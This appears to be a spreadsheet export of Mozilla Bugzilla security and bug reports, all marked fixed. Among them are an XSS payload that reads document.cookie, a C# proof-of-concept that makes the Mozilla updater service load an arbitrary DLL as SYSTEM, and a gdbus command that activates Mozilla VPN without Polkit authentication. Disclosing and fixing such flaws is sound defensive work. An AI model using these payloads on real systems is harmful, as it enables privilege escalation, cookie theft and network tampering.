        </is>
      </c>
      <c r="M6389" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6389" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6389" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6389" t="inlineStr">
        <is>
          <t>[adv-main58+]</t>
        </is>
      </c>
      <c r="Q6389" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6389" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6389" t="inlineStr">
        <is>
          <t>Firefox 59</t>
        </is>
      </c>
      <c r="T6389" t="n">
        <v>1</v>
      </c>
      <c r="U6389" t="n">
        <v>0</v>
      </c>
      <c r="V6389" t="n">
        <v>44</v>
      </c>
      <c r="W6389" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36
Steps to reproduce:
1. Go to https://vuln.shhnjk.com/swnav.html
2. Now go to https://vuln.shhnjk.com/iframer.php?url=//www.bing.com/images/search?q=Edge
3. Open developer tools and click on any error. 
Actual results:
Resources required to show error details are fetched through service worker registered on https://vuln.shhnjk.com/swnav.html. Leaking cross-origin information.
Attaching PoC  video since it might be difficult to repro.
Expected results:
Developer tool's traffic should not go thought service worker.</t>
        </is>
      </c>
      <c r="X6389" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6390">
      <c r="A6390" t="n">
        <v>146447</v>
      </c>
      <c r="B6390" t="inlineStr">
        <is>
          <t>2002-05-23 08:40:00 -0700</t>
        </is>
      </c>
      <c r="C6390" t="inlineStr">
        <is>
          <t>cross-site scripting bug with bugzilla user's name</t>
        </is>
      </c>
      <c r="D6390" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:30 -0800</t>
        </is>
      </c>
      <c r="E6390" t="n">
        <v>1</v>
      </c>
      <c r="F6390" t="n">
        <v>1</v>
      </c>
      <c r="G6390" t="n">
        <v>4</v>
      </c>
      <c r="H6390" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I6390" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J6390" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K6390" t="inlineStr">
        <is>
          <t>2.15</t>
        </is>
      </c>
      <c r="L6390" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6390" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6390" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6390" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6390" t="inlineStr">
        <is>
          <t>[SECURITY] applied to 2.14.2</t>
        </is>
      </c>
      <c r="Q6390" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6390" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S6390" t="inlineStr">
        <is>
          <t>Bugzilla 2.14</t>
        </is>
      </c>
      <c r="T6390" t="n">
        <v>1</v>
      </c>
      <c r="U6390" t="n">
        <v>0</v>
      </c>
      <c r="V6390" t="n">
        <v>22</v>
      </c>
      <c r="W6390" t="inlineStr">
        <is>
          <t>I changed my full name to &lt;b&gt;Jan!&lt;/b&gt; and that worked (as in: bold font).
Similary, when I changed it to
Jan! &lt;script&gt;alert("XSS: see bug #!\n\n" + document.cookie)&lt;/script&gt;
that ran the script without a hitch. This is a simple way to steal people's
cookies, and should be avoided, by escaping/"de-HTML-ing" any and all user input.</t>
        </is>
      </c>
      <c r="X6390" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6391">
      <c r="A6391" t="n">
        <v>230275</v>
      </c>
      <c r="B6391" t="inlineStr">
        <is>
          <t>2004-01-06 21:21:24 -0800</t>
        </is>
      </c>
      <c r="C6391" t="inlineStr">
        <is>
          <t>[FIXr]XML RDF parser stops parsing at valid unicode char</t>
        </is>
      </c>
      <c r="D6391" t="inlineStr">
        <is>
          <t>2006-01-30 13:14:05 -0800</t>
        </is>
      </c>
      <c r="E6391" t="n">
        <v>1</v>
      </c>
      <c r="F6391" t="n">
        <v>1</v>
      </c>
      <c r="G6391" t="n">
        <v>3</v>
      </c>
      <c r="H6391" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6391" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6391" t="inlineStr">
        <is>
          <t>XML</t>
        </is>
      </c>
      <c r="K6391" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6391" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6391" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N6391" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6391" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6391" t="inlineStr"/>
      <c r="Q6391" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6391" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6391" t="inlineStr">
        <is>
          <t>mozilla1.9alpha1</t>
        </is>
      </c>
      <c r="T6391" t="n">
        <v>1</v>
      </c>
      <c r="U6391" t="n">
        <v>0</v>
      </c>
      <c r="V6391" t="n">
        <v>20</v>
      </c>
      <c r="W6391" t="inlineStr">
        <is>
          <t>The URL http://blogs.osafoundation.org/mitch/rss/1.0/ returns an RSS file
encoded in UTF-8 and containing the Unicode character #2013 (EN DASH), which is
encoded into UTF-8 as the sequence e2 80 93.  When the document is retrieved via
XMLHttpRequest and then passed to the XML RDF parser for parsing, the parser
stops parsing the document at the point it reaches the XML tag containing the
aforementioned character.
To see the problem firsthand, save the attached testcase (testcasedata.xml and
testcase.html) to your local system and load testcase.html.  A script will load
the data via XMLHttpRequest (you'll be asked to give the script
UniversalBrowserRead and UniversalXPConnect privileges) and display the
following data:
1. the URL being loaded;
2. the charset as defined by XMLHttpRequest.channel.URI.originCharset;
3. the data as obtained from XMLHttpRequest.responseText;
4. the data as serialized from XMLHttpRequest.responseXML;
5. after parsing by nsIRDFXMLParser, the RDF node containing the Unicode character;
6. after parsing by nsIRDFXMLParser, the data serialized by nsIRDFXMLSerializer.
Expected Results:
The RDF node exists, and the data serialized by nsIRDFXMLSerializer is a
complete copy of the original file.
Actual Results:
The RDF node does not exist, and the data serialized by nsIRDFXMLSerializer
contains only the data up to the point the parser encountered the Unicode character.
Builds Tested:
Linux Mozilla nightly 2004-01-06-07</t>
        </is>
      </c>
      <c r="X6391" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6392">
      <c r="A6392" t="n">
        <v>1180909</v>
      </c>
      <c r="B6392" t="inlineStr">
        <is>
          <t>2015-07-06 14:14:54 -0700</t>
        </is>
      </c>
      <c r="C6392" t="inlineStr">
        <is>
          <t>Marketplace loads a blank screen in 2.0 because of JavaScript Error: "TypeError: navigator.hasFeature is not a function"</t>
        </is>
      </c>
      <c r="D6392" t="inlineStr">
        <is>
          <t>2015-07-30 22:30:40 -0700</t>
        </is>
      </c>
      <c r="E6392" t="n">
        <v>1</v>
      </c>
      <c r="F6392" t="n">
        <v>1</v>
      </c>
      <c r="G6392" t="n">
        <v>6</v>
      </c>
      <c r="H6392" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I6392" t="inlineStr">
        <is>
          <t>Marketplace Graveyard</t>
        </is>
      </c>
      <c r="J6392" t="inlineStr">
        <is>
          <t>Consumer Pages</t>
        </is>
      </c>
      <c r="K6392" t="inlineStr">
        <is>
          <t>1.4</t>
        </is>
      </c>
      <c r="L6392" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6392" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N6392" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6392" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6392" t="inlineStr"/>
      <c r="Q6392" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6392" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6392" t="inlineStr">
        <is>
          <t>2015-07-07</t>
        </is>
      </c>
      <c r="T6392" t="n">
        <v>1</v>
      </c>
      <c r="U6392" t="n">
        <v>0</v>
      </c>
      <c r="V6392" t="n">
        <v>19</v>
      </c>
      <c r="W6392" t="inlineStr">
        <is>
          <t>Connectivity: wifi
SIM used: n/a
Gaia/device: flame/20150706000206; 2015-07-02 23:35:32 43607033
steps to reproduce:
1. Flash the latest 2.0 engineering build from https://pvtbuilds.mozilla.org/pvt/mozilla.org/b2gotoro/nightly/mozilla-b2g32_v2_0-flame-kk-eng/latest/
2. Launch marketplace prod
expected behavior:
Marketplace loads without any errors
actual behavior:
Marketplace homepage is blank because of the JS error
07-06 23:08:45.479 E/GeckoConsole( 1439): [JavaScript Error: "TypeError: navigator.hasFeature is not a function" {file: "app://marketplace.firefox.com/main.js" line: 91}]
I couldn't reproduce this issue on 2.1</t>
        </is>
      </c>
      <c r="X6392" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6393">
      <c r="A6393" t="n">
        <v>1358154</v>
      </c>
      <c r="B6393" t="inlineStr">
        <is>
          <t>2017-04-20 07:47:57 -0700</t>
        </is>
      </c>
      <c r="C6393" t="inlineStr">
        <is>
          <t>The metadata table fails to join on history data because the joining column (url) has different schemes</t>
        </is>
      </c>
      <c r="D6393" t="inlineStr">
        <is>
          <t>2017-04-27 07:19:21 -0700</t>
        </is>
      </c>
      <c r="E6393" t="n">
        <v>1</v>
      </c>
      <c r="F6393" t="n">
        <v>1</v>
      </c>
      <c r="G6393" t="n">
        <v>2</v>
      </c>
      <c r="H6393" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I6393" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J6393" t="inlineStr">
        <is>
          <t>Home screen</t>
        </is>
      </c>
      <c r="K6393" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6393" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M6393" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N6393" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6393" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6393" t="inlineStr">
        <is>
          <t>[mobileAS]</t>
        </is>
      </c>
      <c r="Q6393" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6393" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6393" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6393" t="n">
        <v>1</v>
      </c>
      <c r="U6393" t="n">
        <v>0</v>
      </c>
      <c r="V6393" t="n">
        <v>3</v>
      </c>
      <c r="W6393" t="inlineStr">
        <is>
          <t>When querying for highlights and topsites we use the metadata table to fetch additional information about a site. This info is stored in a metadata table with the columns (cache_key, url, site_title, site_image). 
The table is then joined in SQL with the site history table on the URL key. Which should work correctly but for some reason some sites that have https URLs in the site history table have http in the page metadata table. So joins end up failing and the metadata is never available. 
I noticed that this happened for me on https://theverge.com</t>
        </is>
      </c>
      <c r="X6393" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6394">
      <c r="A6394" t="n">
        <v>748764</v>
      </c>
      <c r="B6394" t="inlineStr">
        <is>
          <t>2012-04-25 07:19:21 -0700</t>
        </is>
      </c>
      <c r="C6394" t="inlineStr">
        <is>
          <t>Possible Arbitrary Code Execution by Update Service</t>
        </is>
      </c>
      <c r="D6394" t="inlineStr">
        <is>
          <t>2024-05-29 16:00:44 -0700</t>
        </is>
      </c>
      <c r="E6394" t="n">
        <v>1</v>
      </c>
      <c r="F6394" t="n">
        <v>1</v>
      </c>
      <c r="G6394" t="n">
        <v>3</v>
      </c>
      <c r="H6394" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6394" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J6394" t="inlineStr">
        <is>
          <t>Application Update</t>
        </is>
      </c>
      <c r="K6394" t="inlineStr">
        <is>
          <t>12 Branch</t>
        </is>
      </c>
      <c r="L6394" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6394" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6394" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6394" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6394" t="inlineStr">
        <is>
          <t>[sg:critical][advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q6394" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6394" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6394" t="inlineStr">
        <is>
          <t>mozilla15</t>
        </is>
      </c>
      <c r="T6394" t="n">
        <v>1</v>
      </c>
      <c r="U6394" t="n">
        <v>0</v>
      </c>
      <c r="V6394" t="n">
        <v>31</v>
      </c>
      <c r="W6394" t="inlineStr">
        <is>
          <t>Hi,
I notice two security issues in the new Mozilla updater service which came with FF12 on Windows I would like to report.
a) The service path is not quoted which means you can end up with the potential for a planting attack (e.g. if you can create C:\Program.exe it will run it when starting the service).
b) The service itself can be tricked into loading a DLL into the process with SYSTEM privileges and it will run its DLLMain (meaning you can do anything you like). You call LoadLibrary instead of LoadLibraryEx on line 329 of workmonitor.cpp when checking that you have the correct resource string. It should be called to only load it as a resource.
The following C# code will run the service and will load a DLL as long as the files C:\sourcecode\exploitme.dll and C:\sourcecode\updater.exe are the same. The DLL can then in DllMain run something like CreateProcess.
using System;
using System.ServiceProcess;
namespace FFService
{
    class Program
    {
        static void Main(string[] args)
        {
            try
            {
                ServiceController c = new ServiceController("MozillaMaintenance");
                c.Start(new string[] { "aaa", "software-update", "C:\\sourcecode\\exploitme.dll", "aaaa", "c:\\sourcecode\\", "cccc" });
            }
            catch (Exception e)
            {
                Console.WriteLine(e);
            }
        }
    }
}
I have only tested in XP Pro SP3 but I assume it will work on Win7 and Vista just the same.
If you need more information let me know.
James Forshaw
Principal Security Consultant
Context Information Security
Registered no: 3574635 | Certified to ISO/IEC 27001:2005 (BSI Certificate IS 553326) and ISO 9001:2008 (BSI Certificate FS 581360)
www.contextis.com | 30 Marsh Wall, London E14 9TP, UK | Mob: +44 (0)7827 248760 | Tel:Â 0207 537 7515 | Fax: 0207 537 1071
The information contained in this email and any attachments may be legally privileged and confidential.Â  If you are not the intended recipient you are notified that disclosing, copying, distributing or taking any action in reliance on the contents of this information is strictly prohibited.Â  If you are not the intended recipient please contact us immediately.Â  Any views or opinions presented in this email are solely those of the author and do not necessarily represent those of the company.</t>
        </is>
      </c>
      <c r="X6394" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6395">
      <c r="A6395" t="n">
        <v>830975</v>
      </c>
      <c r="B6395" t="inlineStr">
        <is>
          <t>2013-01-15 13:24:34 -0800</t>
        </is>
      </c>
      <c r="C6395" t="inlineStr">
        <is>
          <t>[FIX] nsDocument::FlushPendingNotifications looks suspicious</t>
        </is>
      </c>
      <c r="D6395" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E6395" t="n">
        <v>1</v>
      </c>
      <c r="F6395" t="n">
        <v>1</v>
      </c>
      <c r="G6395" t="n">
        <v>3</v>
      </c>
      <c r="H6395" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6395" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6395" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K6395" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6395" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6395" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6395" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6395" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6395" t="inlineStr">
        <is>
          <t>[adv-main19+][adv-esr1703+]</t>
        </is>
      </c>
      <c r="Q6395" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6395" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6395" t="inlineStr">
        <is>
          <t>mozilla21</t>
        </is>
      </c>
      <c r="T6395" t="n">
        <v>1</v>
      </c>
      <c r="U6395" t="n">
        <v>0</v>
      </c>
      <c r="V6395" t="n">
        <v>30</v>
      </c>
      <c r="W6395" t="inlineStr">
        <is>
          <t>http://mxr.mozilla.org/mozilla-central/source/content/base/src/nsDocument.cpp?rev=fe51ccc53083#6715
Callers of FlushPendingNotifications should keep the document alive.
That doesn't always happen since, since even within 
nsDocument::FlushPendingNotifications itself it calls mParentDocument-&gt;FlushPendingNotifications,
and mParentDocument is a  member variable and doesn't guarantee that the object stays alive during the call
(if something ends up clearing the member variable).
Any objections if I add some nsCOMPtrs to keep stuff alive long enough?
Unfortunately that may show up in some profiles.</t>
        </is>
      </c>
      <c r="X6395" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6396">
      <c r="A6396" t="n">
        <v>1831318</v>
      </c>
      <c r="B6396" t="inlineStr">
        <is>
          <t>2023-05-04 05:54:19 -0700</t>
        </is>
      </c>
      <c r="C6396" t="inlineStr">
        <is>
          <t>Linux privileged vpndaemon wrongly and incompletely implements Polkit authentication; potential information Leaks</t>
        </is>
      </c>
      <c r="D6396" t="inlineStr">
        <is>
          <t>2023-09-27 10:23:39 -0700</t>
        </is>
      </c>
      <c r="E6396" t="n">
        <v>1</v>
      </c>
      <c r="F6396" t="n">
        <v>1</v>
      </c>
      <c r="G6396" t="n">
        <v>2</v>
      </c>
      <c r="H6396" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I6396" t="inlineStr">
        <is>
          <t>Mozilla VPN</t>
        </is>
      </c>
      <c r="J6396" t="inlineStr">
        <is>
          <t>Client for Linux</t>
        </is>
      </c>
      <c r="K6396" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6396" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M6396" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N6396" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6396" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6396" t="inlineStr">
        <is>
          <t>[external reporter][suggested disclosure date 2023-08-02 or earlier]</t>
        </is>
      </c>
      <c r="Q6396" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6396" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S6396" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6396" t="n">
        <v>1</v>
      </c>
      <c r="U6396" t="n">
        <v>0</v>
      </c>
      <c r="V6396" t="n">
        <v>21</v>
      </c>
      <c r="W6396" t="inlineStr">
        <is>
          <t>&gt; Hello Mozilla security,
&gt;
&gt; I am a member of the SUSE security team. An openSUSE user wants to
&gt; package Mozilla VPN for openSUSE Tumbleweed. For this a review of the
&gt; D-Bus service and Polkit authentication contained in Mozilla VPN is
&gt; required.
&gt;
&gt; A colleague and I reviewed the Mozilla VPN codebase for release 2.14.1
&gt; and we believe to have found local security issues in the D-Bus daemon
&gt; implementation. Please find the details below.
&gt;
&gt; Coordinated Disclosure Process
&gt; ==============================
&gt;
&gt; The SUSE security team offers coordinated disclosure according to the
&gt; openSUSE disclosure policy [1]. We can keep the issue(s) private for up
&gt; to 90 days, but recommend shorter embargo periods of 14 days. As of
&gt; today the latest publication date will be 2023-08-02.
&gt;
&gt; Please inform us whether you can confirm the security issues in this
&gt; report, whether you want to follow coordinated disclosure and what your
&gt; desired publication date is. The alternative to coorindated disclosure
&gt; is to make the issues public right away.
&gt;
&gt; [1]: https://en.opensuse.org/openSUSE:Security_disclosure_policy
&gt;
&gt; Broken Polkit Authentication Check
&gt; ==================================
&gt;
&gt; The code for the privileged component in Mozilla VPN on Linux is mostly
&gt; found in mozillavpn-2.14.1/src/apps/vpn/platforms/linux. The D-Bus
&gt; method callbacks are found in
&gt;
&gt;     src/apps/vpn/platforms/linux/daemon/dbusservice.cpp.
&gt;
&gt; Mozilla VPN ships a Polkit policy with the following content:
&gt;
&gt; ```
&gt;  &lt;action id="org.mozilla.vpn.activate"&gt;
&gt;     &lt;description&gt;Activate the Mozilla VPN&lt;/description&gt;
&gt;     &lt;message&gt;Activate the Mozilla VPN&lt;/message&gt;
&gt;     &lt;defaults&gt;
&gt;       &lt;allow_inactive&gt;no&lt;/allow_inactive&gt;
&gt;       &lt;allow_active&gt;auth_admin&lt;/allow_active&gt;
&gt;     &lt;/defaults&gt;
&gt;   &lt;/action&gt;
&gt;
&gt;   &lt;action id="org.mozilla.vpn.deactivate"&gt;
&gt;     &lt;description&gt;Deactivate the Mozilla VPN&lt;/description&gt;
&gt;     &lt;message&gt;Deactivate the Mozilla VPN&lt;/message&gt;
&gt;     &lt;defaults&gt;
&gt;       &lt;allow_inactive&gt;no&lt;/allow_inactive&gt;
&gt;       &lt;allow_active&gt;auth_admin&lt;/allow_active&gt;
&gt;     &lt;/defaults&gt;
&gt;   &lt;/action&gt;
&gt; ```
&gt;
&gt; Of these two privileged actions, the polkit authorization check is only
&gt; performed in the `activate` D-Bus method, while no such check is present
&gt; at all in the `deactive` method.
&gt;
&gt; For the activate D-Bus method the Polkit check is implemented in
&gt; PolkitHelper::checkAuthorization() in
&gt; src/apps/vpn/platforms/linux/daemon/polkithelper.cpp line 58:
&gt;
&gt; ```
&gt; h.m_subject = polkit_unix_process_new_for_owner(getpid(), 0, -1);
&gt; ```
&gt;
&gt; The UNIX process Polkit subject is deprecated and shouldn't be used
&gt; anymore, because it is by design affected by race conditions. Instead
&gt; the D-Bus sender subject should be used, which is based on the UNIX
&gt; domain socket used by D-Bus to identify the credentials of the client
&gt; via the Linux kernel.
&gt;
&gt; Even worse, the UNIX process polkit subject is initialized here using
&gt; `getpid()` as the process ID and `-1` for the user ID, The latter asks
&gt; Polkit to determine the given PID's user ID by looking into /proc.
&gt; Basically this asks Polkit to check whether the _privileged_ Mozilla VPN
&gt; D-Bus service _itself_ is authorized to perform the action. Since The
&gt; Mozilla VPN D-Bus service runs as root, this will always be true.
&gt;
&gt; This can be verified from the command line using a minimal pseudo
&gt; configuration like this:
&gt;
&gt;     nobody$ gdbus call -y -d org.mozilla.vpn.dbus -o / -m org.mozilla.vpn.dbus.activate \
&gt;         '{"privateKey": "stuff", "serverPublicKey": "stuff", "serverPort": 1234, "deviceIpv4Address": "127.0.0.2", "serverIpv4AddrIn": "127.0.0.3", "allowedIPAddressRanges": []}'
&gt;
&gt; This D-Bus call will work without any authentication, even if a fully
&gt; unprivileged user account like `nobody` runs it.
&gt;
&gt; The impact is that arbitrary local users can configure arbitrary VPN
&gt; setups using Mozilla VPN and thus possibly redirect network traffic to
&gt; malicious parties, pretend that a secure VPN is present while it
&gt; actually isn't, perform a DoS against an existing VPN connection or
&gt; other integrity violations.
&gt;
&gt; Since the linux daemon does not perform any file system operations or
&gt; otherwise dangerous operations besides of the network setup I don't see
&gt; a possibility to escalate privileges using this attack vector.
&gt;
&gt; Missing Polkit Authentication Checks
&gt; ====================================
&gt;
&gt; Apart from the fact that the existing Polkit authentication check is
&gt; wrong, there isn't even an attempt to secure any of the other D-Bus
&gt; methods offered by the Mozilla VPN D-Bus service.
&gt;
&gt; For the following methods Polkit authorization checks should be
&gt; considered, or their scope should be limited by other means:
&gt;
&gt; - getLogs(): returns potentially problematic world-readable log data, even
&gt;   debug logs, e.g. also about other users' activities in the system. The
&gt;   same data is publically available in /var/log/mozillavpn.txt. These
&gt;   logs allow tracking of what applications other users start, for
&gt;   example.
&gt;
&gt;   Log data of system services should generally not be world readable, so
&gt;   this item refers to both, the D-Bus API and the logfile in /var/log.
&gt;   This is an information leak (especially since there is also debug data
&gt;   found here) that might facilitate other security issues or might allow
&gt;   other users in the system to deduce what a Mozilla VPN user is doing.
&gt;
&gt; - cleanupLogs(): allows everybody to clear the current logs. This should
&gt;   be restricted to authorized users, otherwise it might be used to clear
&gt;   traces of attacks etc.
&gt;
&gt; - runningApps(): this leaks information from other users'
&gt;   sessions and their apps to everybody in the system. Most of this data
&gt;   is probably also available via `ps` or /proc, respectively. Some
&gt;   hardened systems may not allow this, though. A solution might be to
&gt;   only return data here that belongs to the user making the request on
&gt;   D-Bus.
&gt;
&gt; - firewallApp(): allows to put arbitrary appIDs into split tunneling /
&gt;   exclude, even for other users. This should be restricted to
&gt;   applications of the requesting D-Bus user.
&gt;
&gt; - firewallClear(): clears the exclude list. should also be restricted to
&gt;   entries affecting the calling user.
&gt;
&gt; - deactivate(): everybody may shutdown the whole VPN. There is a
&gt;   deactivate() Polkit action declared but is is never used.
&gt;
&gt; From looking at the D-Bus implementation it is apparent that Mozilla VPN
&gt; on Linux doesn't really have a proper multi user concept. A simple way
&gt; out of this may be to store the UID of the user that successfully
&gt; authenticates during activate() and then only allow the other D-Bus
&gt; methods for the same user until deactivate() is called. Mixing
&gt; different user contexts would be avoided this way.
&gt;
&gt; Privilege Drop Considerations
&gt; =============================
&gt;
&gt; As far as I see the Mozilla VPN linux daemon only uses its higher
&gt; privileges for two things:
&gt;
&gt; - setting up the network
&gt; - monitoring user sessions and attaching to their D-Bus session busses
&gt;   to keep track of running applications ("AppTracker" class).
&gt;
&gt; It could be considered running this service not as root but only with
&gt; the CAP_NET_ADMIN capability. This would limit the potential attack
&gt; surface considerably. I'm not sure how well this idea plays with the
&gt; monitoring aspects, but it is a direction that could be investigated to
&gt; harden this D-Bus service. Also dropping privileged to an unauthorized
&gt; user and only raising them on a case-by-case basic e.g. when connecting
&gt; to other users' session busses might be a way to go.
&gt;
&gt; CVE assignments
&gt; ===============
&gt;
&gt; The invalid Polkit Authentication check and the unauthenticated
&gt; decativate() D-Bus method deserve CVE assignments. Please inform us
&gt; whether you will assign CVEs on your end. I understand that you are a
&gt; CVE CNA so this would fall into your responsibility.
&gt;
&gt; The other missing authentication checks and possible information leaks
&gt; are a bit of a gray area and will not necessarily need CVEs from my
&gt; point of view.
&gt;
&gt; Cheers
&gt;
&gt; Matthias
&gt;</t>
        </is>
      </c>
      <c r="X6396" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6397">
      <c r="A6397" t="n">
        <v>1828334</v>
      </c>
      <c r="B6397" t="inlineStr">
        <is>
          <t>2023-04-16 07:58:29 -0700</t>
        </is>
      </c>
      <c r="C6397" t="inlineStr">
        <is>
          <t>Protocol handler warning should not be skipped for external scheme URLs entered directly in the addressbar (or other UI)</t>
        </is>
      </c>
      <c r="D6397" t="inlineStr">
        <is>
          <t>2024-05-30 11:08:27 -0700</t>
        </is>
      </c>
      <c r="E6397" t="n">
        <v>1</v>
      </c>
      <c r="F6397" t="n">
        <v>1</v>
      </c>
      <c r="G6397" t="n">
        <v>2</v>
      </c>
      <c r="H6397" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I6397" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J6397" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K6397" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6397" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6397" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6397" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6397" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6397" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main121+]</t>
        </is>
      </c>
      <c r="Q6397" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6397" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S6397" t="inlineStr">
        <is>
          <t>121 Branch</t>
        </is>
      </c>
      <c r="T6397" t="n">
        <v>1</v>
      </c>
      <c r="U6397" t="n">
        <v>0</v>
      </c>
      <c r="V6397" t="n">
        <v>49</v>
      </c>
      <c r="W6397" t="inlineStr">
        <is>
          <t>Created attachment 9328716
Protocol Handler Warning Bypass.pdf
A full copy of this bug bounty submission with full screenshots can be found in the attached PDF file. I have also attached a video recording of the persistent soft lock. However, as this can't be recorded on the soft-locked device, the recording quality is quite low.
Issue Context
A protocol handler is an application that knows how to interpret particular types of links: for example, a mail client is a protocol handler for "mailto:" links. This allows external applications to be opened via a browser by navigating to a link such as “mailto:client@domainname.internal”.
